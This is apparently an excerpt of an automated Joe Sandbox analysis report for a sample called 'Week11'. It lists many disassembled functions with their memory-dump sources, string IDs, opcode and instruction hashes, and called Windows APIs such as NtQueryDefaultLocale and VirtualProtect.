                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-3635020934
                                • Opcode ID: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
                                • Instruction ID: 48de20c76db8c3de671630d63b886f22b0c06a9148901f48d914f27b83d1fb03
                                • Opcode Fuzzy Hash: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
                                • Instruction Fuzzy Hash: 736117B1D096A88AF7218B25DC447EABB75EF51300F1480FEC44C97682D67E4FC68B66
                                Function 0040618E Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
                                • Instruction ID: ced5aa437ee35238d930c7b104e160baf39eb88925bb8b05c2a6ef6763ec6812
                                • Opcode Fuzzy Hash: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
                                • Instruction Fuzzy Hash: 3171E4A1E083989EF7208624CC84BEB7B75EF91300F0541FAD48D67681D67E1FD58B66
                                Function 00406194 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
                                • Instruction ID: 6c2571c954ef4d03a8d8fed5108f159e5fbdfac35f81ed42c821c525546270d9
                                • Opcode Fuzzy Hash: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
                                • Instruction Fuzzy Hash: 9C71F4A1E083989EF7208624CC84BEB7B75EF92304F0441FAD48D67681D67E1FD58B66
                                Function 0040619F Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
                                • Instruction ID: fe841b6793d8beded5587f449d57caddeb69ca6b736605e5fabbf832e423c488
                                • Opcode Fuzzy Hash: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
                                • Instruction Fuzzy Hash: FB71E461E083989EF7208624CC84BEB7B75EF92300F0481FAD48D67681D67E1FD58B66
                                Function 004061FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
                                • Instruction ID: 73b9da147c84c11f77d225f4121026b3fa65a4ee4fbc036ab2decc08f9526212
                                • Opcode Fuzzy Hash: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
                                • Instruction Fuzzy Hash: 3F71C3A1E083989AF7208624CC847EA7B75EF91304F0480FAD48D67681D67E5FD58B66
                                Function 004063FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 179COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
                                • Instruction ID: 5ea93c5cef2c5e65ef2b2574122109ce581030336684adb32c555981ce0bf4e4
                                • Opcode Fuzzy Hash: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
                                • Instruction Fuzzy Hash: 7961D661E08398DEF7208624CC84BEA7B75EF91300F0481FAD48DA7681D67E5FD58B66
                                Function 004171D5 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 384nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: a
                                • API String ID: 2949231068-3904355907
                                • Opcode ID: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
                                • Instruction ID: c649a5e9774caa28317db665e42282bf5a18610ef2299b6222cde23d22d20275
                                • Opcode Fuzzy Hash: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
                                • Instruction Fuzzy Hash: FAF181B1D086288BDB24CF14CC94AEAB7B1FB85301F1481EAD84D67645D7385EC2CF55
                                Function 00416E88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 231nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
                                • Instruction ID: fc210762df59391765cc8805784750e672337dfb326893282e5de2c061f102c8
                                • Opcode Fuzzy Hash: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
                                • Instruction Fuzzy Hash: 1291D2B1C082699BD7208B24CC947EBBBB4EF45310F1441FAD94DA7681E6388EC6CB56
                                Function 0041712E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
                                • Instruction ID: 87f3a9b5aa80160d050a753c72d5f6b7cfc327e9bc981b88158256262f9f7d3b
                                • Opcode Fuzzy Hash: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
                                • Instruction Fuzzy Hash: 8981E0B1C083699FDB24CB24CC907EABBB4EF45310F1441EAD949A7241E6398EC6CF56
                                Function 00416FA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
                                • Instruction ID: eed724c50ca4fe5c5fa6ffd5a7f16ed8747731d8aa71036cf8de9cba42c802bf
                                • Opcode Fuzzy Hash: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
                                • Instruction Fuzzy Hash: A88116B1C083699BDB208B21CC907FA7BB5FF45310F1445EAD84DA7281E6388EC6CB56
                                Function 00416D8F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: I@JA
                                • API String ID: 2949231068-3163526114
                                • Opcode ID: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
                                • Instruction ID: 06b353535dcdc859f0034f7b559fc19347504739200407afbfc489a7606d802f
                                • Opcode Fuzzy Hash: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
                                • Instruction Fuzzy Hash: 852149F2D085686BE3248B25DC54BE77B78EF11320F1900FAD94996541E23C9AC68FA2
                                Function 00416776 Relevance: 2.0, APIs: 1, Instructions: 508nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
                                • Instruction ID: f2660a84a9785de92d6c4179d1ea05aee36040fdd5cdfb55622016ef69124e4c
                                • Opcode Fuzzy Hash: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
                                • Instruction Fuzzy Hash: 9712C2B1D042289BEB248B14DD90BEAB7B5EB85310F1581FAD84D56640D738AFC2CF95
                                Function 0041F640 Relevance: 1.8, APIs: 1, Instructions: 348memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 97bab8264f287768de0b2093433d6d5173df51ab0203acf61cbd534e65563103
                                • Instruction ID: 9548006abfd6f51041c3fc3b8b5cb9dce147eeb380a758c0b6e7585f7c973d26
                                • Opcode Fuzzy Hash: 97bab8264f287768de0b2093433d6d5173df51ab0203acf61cbd534e65563103
                                • Instruction Fuzzy Hash: FCE17CB5D08668CFEB24CB14DC90BEAB7B5FF84304F1481EAD80DA6241D6786EC68F55
                                Function 0041667D Relevance: 1.7, APIs: 1, Instructions: 215nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 59459fa92b677c7f1ad3f86b7172cfd0b0f8ee9eeec140b959236eb366d536dd
                                • Instruction ID: cf0f9888e6c0fdfe7daccb9502d171945e63c8099a6660917ff7317841e0266c
                                • Opcode Fuzzy Hash: 59459fa92b677c7f1ad3f86b7172cfd0b0f8ee9eeec140b959236eb366d536dd
                                • Instruction Fuzzy Hash: 947113B2D042289BE7208B24DC44BFA7775FF91314F1581FAD84D96681E3389BC68F56
                                Function 0041FBE3 Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d0afb876c3b0d1abe311b27940b4f473a05329334d0606c6caf219659df0063f
                                • Instruction ID: 2ceca7f99152f584142aab836997eea5ceebed15efab7292adc8b31458bb2867
                                • Opcode Fuzzy Hash: d0afb876c3b0d1abe311b27940b4f473a05329334d0606c6caf219659df0063f
                                • Instruction Fuzzy Hash: 1771D2B1D046699FEB24CF14DD44AFBB7B4EB84300F1081FAD84AA6241E6785EC6CF65
                                Function 0041FC8D Relevance: 1.7, APIs: 1, Instructions: 181memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 93fb6f32c49816f4795518e91337438f7992a44652400c0e80f6ac963471574b
                                • Instruction ID: 85be730ccd08636fae68262ea7d74ee548edc85a105b8a1ca00ea36e691da46f
                                • Opcode Fuzzy Hash: 93fb6f32c49816f4795518e91337438f7992a44652400c0e80f6ac963471574b
                                • Instruction Fuzzy Hash: 4671F4B1D042698EDB248F25DC80AFAB7B5EF85314F1441FAD44AA6251EB385EC6CF21
                                Function 0041FE60 Relevance: 1.7, APIs: 1, Instructions: 171memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
